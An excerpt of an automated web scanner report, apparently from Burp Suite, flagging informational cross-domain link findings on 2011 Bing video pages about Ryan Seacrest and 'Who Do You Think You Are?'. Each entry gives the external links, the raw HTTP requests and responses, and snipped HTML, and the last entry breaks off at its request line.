<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.411. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan+Seacrest&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=291a31e1-4e41-492a-afa4-44d5d060f37b&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=0b6d89aa-53fd-4482-b58f-0477c9668812&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=1f603c0d-45e1-43e0-84c6-ce39d8f646c9&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=79124421-113f-4242-b74d-1e211283c836&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=791e66cc-e3fe-45c2-92f5-55979db0a7b3&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=2e763b1c-1444-49ad-82c9-a62ec883337e&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=4b0c18f6-74e1-45a7-9cb8-10325a65ccb1&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=97b17865-206f-4b10-8e1d-483c13059d35&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=c47cb72f-3b80-4f02-903b-f9bc5699b400&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=690064fc-df17-4c4b-bece-61431ddd69a8&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fryan-seacrest-part-1%2f17wnurhvy%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/jimmy-kimmel-live
http://www.hulu.com/watch?content_id=50117771
http://www.redacted/

Request

GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan+Seacrest&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=819
Content-Length: 104380
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:06:06 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:26 GMT
Connection: close
Set-Cookie: _SS=SID=DCC1C113BCC4431182D1F5899923D722; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f69fa639e58494b92dc419414b84b6c; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fryan-seacrest-part-1%2f17wnurhvy%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/jimmy-kimmel-live" data-instName="InfoRelatedLinks">Hulu - Jimmy Kimmel Live</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117771" data-instName="InfoRelatedLinks">Hulu Watch Page - Ryan Seacrest, Part 1</a>
...[SNIP]...
" class="motionThumb playerUrl"
title="In this episode of Celebritweets Theater, Ryan Seacrest pressures Simon Cowell into joining Twitter." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=79124421-113f-4242-b74d-1e211283c836&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
m/videos/watch/video/justin-bieber-talks-with-ryan-seacrest-pt-3/567mncf?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan Seacrest interviews Justin Bieber" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=1f603c0d-45e1-43e0-84c6-ce39d8f646c9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;about the changes coming to Season 10. "American Idol" airs Wednesdays and Thursdays at 8 p.m. ET/PT on FOX." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=791e66cc-e3fe-45c2-92f5-55979db0a7b3&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
32;finale Ryan Seacrest and Simon Cowell go inside Simon's extravagant trailer and Simon introduces British boy band JLS." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=c47cb72f-3b80-4f02-903b-f9bc5699b400&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
m/videos/watch/video/justin-bieber-talks-with-ryan-seacrest-pt-2/5ep3p1t?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan Seacrest interviews Justin Bieber" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=2e763b1c-1444-49ad-82c9-a62ec883337e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 she and Ryan Seacrest are dating. Has he visited her on the set? Plus, will she return to "Dancing"?" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=97b17865-206f-4b10-8e1d-483c13059d35&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
deos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Part 1 of Jimmy's interview with Ryan Seacrest." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=4b0c18f6-74e1-45a7-9cb8-10325a65ccb1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;Spice how great their new commercial was. And to his surprise he got a response from the Old Spice guy himself." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=0b6d89aa-53fd-4482-b58f-0477c9668812&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
m/videos/watch/video/justin-bieber-talks-with-ryan-seacrest-pt-1/55lymwa?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan Seacrest interviews Justin Bieber" >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=291a31e1-4e41-492a-afa4-44d5d060f37b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
videos/watch/video/sundance-2011-ryan-seacrest-from-the-bing-bar/1rwlnk0je?q=Ryan%20Seacrest&rel=MSN" class="motionThumb playerUrl"
title="Ryan Seacrest from the Bing Bar." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=690064fc-df17-4c4b-bece-61431ddd69a8&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.412. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=374bde5b-6704-4192-a1f6-9146f8d2ebd2&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=53511df1-cab0-4899-b3ac-57fd23e16f42&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=a4423ac0-090e-40c9-8a6a-3ec31bb067a7&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=c54b46a6-0935-40a0-b5bc-d168ded2e84c&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=1f9e42d4-9168-44cd-be7a-a673ec791b6a&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=2eaf70dc-6430-446a-867d-8b8314058f1a&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=28b30d21-82db-4788-9b33-1a1558ad6b5b&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhere-it-all-began%2f17wv375x2%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/watch?content_id=50117868
http://www.hulu.com/who-do-you-think-you-are
http://www.redacted/

Request

GET /videos/watch/video/where-it-all-began/17wv375x2?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=341
Content-Length: 104644
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:58:19 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:37 GMT
Connection: close
Set-Cookie: _SS=SID=E60514C9F1E446758A7DCFAAFE1F4FA1; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9eaa226e970444bbada7130c6245e910; expires=Mon, 28-Jan-2013 23:52:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:37 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhere-it-all-began%2f17wv375x2%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/who-do-you-think-you-are" data-instName="InfoRelatedLinks">Hulu - Who Do You Think You Are?</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117868" data-instName="InfoRelatedLinks">Hulu Watch Page - Where It All Began</a>
...[SNIP]...
s="motionThumb playerUrl"
title="Eight of our most favorite celebrities travel the globe to unlock the mysteries of their heritage." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=c54b46a6-0935-40a0-b5bc-d168ded2e84c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
%20are&rel=MSN" class="motionThumb playerUrl"
title="The amazing journies of celebrities' pasts is back for season two on February 4th." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=28b30d21-82db-4788-9b33-1a1558ad6b5b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
Url"
title="Discover the singing star's connection to George Washington on this season of Who Do You Think You Are?" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
0think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Eight of today's hottest celebrities learn how history has shaped their lives." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=53511df1-cab0-4899-b3ac-57fd23e16f42&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Vanessa makes a fascinating discovery about her great great grandfather." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
lass="motionThumb playerUrl"
title="Get to know Vanessa as she's about to embark on the journey of not just one lifetime..." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=374bde5b-6704-4192-a1f6-9146f8d2ebd2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
km4?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="A look at singing star Tim McGraw's incredible upcoming journey." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=a4423ac0-090e-40c9-8a6a-3ec31bb067a7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
" class="motionThumb playerUrl"
title="Vanessa Williams makes more than one rare discovery at the National Archives in Washington, D.C." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=1f9e42d4-9168-44cd-be7a-a673ec791b6a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
humb playerUrl"
title="Vanessa's journey into her family's past being with a visit to her father's final resting place." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ation/17w25sd78?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Lisa Kudrow explains why we Americans are just as smart." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=2eaf70dc-6430-446a-867d-8b8314058f1a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.413. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=374bde5b-6704-4192-a1f6-9146f8d2ebd2&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=53511df1-cab0-4899-b3ac-57fd23e16f42&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=9bc269b0-2581-11df-a9a6-5a3963a74c6d&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=a4423ac0-090e-40c9-8a6a-3ec31bb067a7&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=c54b46a6-0935-40a0-b5bc-d168ded2e84c&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=1f9e42d4-9168-44cd-be7a-a673ec791b6a&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=28b30d21-82db-4788-9b33-1a1558ad6b5b&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhere-it-all-began%2f17wv375x2%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/watch?content_id=50117868
http://www.hulu.com/who-do-you-think-you-are
http://www.redacted/

Request

